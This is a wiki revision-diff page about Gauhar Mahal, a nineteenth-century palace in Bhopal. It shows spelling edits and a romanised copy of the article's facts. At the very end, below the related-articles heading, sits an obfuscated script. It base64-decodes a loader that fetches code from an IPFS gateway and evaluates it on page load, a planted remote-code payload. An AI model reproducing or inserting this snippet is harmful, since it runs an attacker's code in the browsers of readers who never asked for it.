Difference between revisions of "गौहर महल भोपाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खूबसूरत" to "ख़ूबसूरत")
m (Text replace - "नक्काशी" to "नक़्क़ाशी")
Line 9: Line 9:
 
*गौहर महल में दीवान-ए आम और दीवान-ए-ख़ास हैं।  
 
*गौहर महल में दीवान-ए आम और दीवान-ए-ख़ास हैं।  
 
*गौहर महल के आंतरिक भाग में नयनाभिराम फब्बारे थे जो कालान्तर में नष्ट हो गये हैं। फब्बारों की हौज अब भी विद्यमान है।  
 
*गौहर महल के आंतरिक भाग में नयनाभिराम फब्बारे थे जो कालान्तर में नष्ट हो गये हैं। फब्बारों की हौज अब भी विद्यमान है।  
*हल के ऊपर का हिस्सा में एक ऐसा कमरा है जिससे पूरे शहर का नजारा दिखाता है और इसके दरवाजों पर कांच से नक्काशी की गई है।  
+
*हल के ऊपर का हिस्सा में एक ऐसा कमरा है जिससे पूरे शहर का नजारा दिखाता है और इसके दरवाजों पर कांच से नक़्क़ाशी की गई है।  
*गौहर महल की दीवारों पर लकड़ी के नक्काशीदार स्तंभ, वितान और मेहराबें हैं। स्तंभों पर आकृतियां और फूल पत्तियों का अंकन है।  
+
*गौहर महल की दीवारों पर लकड़ी के नक़्क़ाशीदार स्तंभ, वितान और मेहराबें हैं। स्तंभों पर आकृतियां और फूल पत्तियों का अंकन है।  
 
*आंतरिक हिस्स में बेगम का निवास था जिसकी खिड़कियों से बड़े तालाब का मनोरम दृश्य दिखाई देता है।  
 
*आंतरिक हिस्स में बेगम का निवास था जिसकी खिड़कियों से बड़े तालाब का मनोरम दृश्य दिखाई देता है।  
 
*भवन की दूसरी मंजिल पर एक प्रसूतिगृह था, जिसकी दीवारों पर रंगीन चित्र बने थे।  
 
*भवन की दूसरी मंजिल पर एक प्रसूतिगृह था, जिसकी दीवारों पर रंगीन चित्र बने थे।  

Revision as of 11:22, 30 November 2010

  • gauhar mahal madhy pradesh ke bhopal shahar ke b de talab ke kinare vhi.aee.pi. rod par sthit hai.
  • shaukat mahal ke pas b di jhil ke kinare sthit vastukala ka yah khoobasoorat namoona kudasiya begam ke kal ka hai.
  • is timanjile bhavan ka nirman bhopal rajy ki tatkalin shasika navab kudasiya begam (sanh 1819-37) ne gauhar mahal ko 1820 ee. mean karaya tha.
  • gauhar mahal 4.65 ek d kshetr mean phaile hai.
  • kudasiya begam ka nam gauhar bhi tha isalie is mahal ko gauhar mahal ke nam se jana jata hai.
  • gauhar mahal bhopal riyasat ka pahala mahal hai.
  • gauhar mahal ki khasiy yah hai ki isaki sajavat bharatiy aur islamik vastukala ko milakar ki gee hai.
  • gauhar mahal hinh‍du aur mugal kala ka adbhut sangam hai.
  • gauhar mahal mean divan-e am aur divan-e-khas haian.
  • gauhar mahal ke aantarik bhag mean nayanabhiram phabbare the jo kalantar mean nasht ho gaye haian. phabbaroan ki hauj ab bhi vidyaman hai.
  • hal ke oopar ka hissa mean ek aisa kamara hai jisase poore shahar ka najara dikhata hai aur isake daravajoan par kaanch se naqqashi ki gee hai.
  • gauhar mahal ki divaroan par lak di ke naqqashidar stanbh, vitan aur meharabean haian. stanbhoan par akritiyaan aur phool pattiyoan ka aankan hai.
  • aantarik hiss mean begam ka nivas tha jisaki khi dakiyoan se b de talab ka manoram drishy dikhaee deta hai.
  • bhavan ki doosari manjil par ek prasootigrih tha, jisaki divaroan par rangin chitr bane the.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>